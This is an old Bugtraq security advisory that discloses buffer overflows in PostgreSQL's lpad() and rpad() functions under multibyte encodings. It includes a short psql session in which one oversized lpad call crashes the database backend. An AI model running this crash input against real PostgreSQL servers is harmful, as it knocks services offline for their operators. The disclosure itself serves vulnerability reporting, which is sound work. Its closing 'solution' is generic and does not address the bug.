From: Sir Mordred The Traitor mordred@s-mail.com
Date: Tue Aug 20, 2002 08:01:34 AM US/Pacific
To: bugtraq@securityfocus.com
Subject: @(#)Mordred Labs advisory 0x0004: Multiple buffer
overflows in PostgreSQL.
//@(#) Mordred Labs advisory 0x0004
Release data: 20/08/02
Name: Two buffer overflows in PostgreSQL
Versions affected: all versions
Conditions: multibyte support
Risk: average
--[ Description:
I guess all of you already hear about the PostgreSQL.
If not, try to visit
http://www.postgresql.org/idocs/index.php?preface.html#INTRO-
WHATIS.
There are two buffer overflows in src/backend/utils/adt/
oracle_compat.c.
1) lpad(text, integer, text) function
2) rpad(text, integer, text) function
--[ Details:
The code for this functions is
src/backend/utils/adt/oracle_compat.c::lpad() and
src/backend/utils/adt/oracle_compat.c::rpad() respectively.
The code suffers from a buffer overflow (of course).
--[ How to reproduce:
shell> pgsql template1 postgres
template1=# select version();
version
-----------------------------------------------------------
PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96
(1 row)
template1=# create database my_db with encoding='UNICODE';
CREATE DATABASE
template1# c my_db
You are now connected to database my_db.
my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy');
pqReadData() -- backend closed the channel unexpectedly.
This probably means the backend terminated abnormally
before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
!#
The same for rpad() function.
The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR,
EUC_TW, UNICODE,
MULE_INTERNAL.
--[ Solution
Secure coding of web applications, input validation checks...etc...
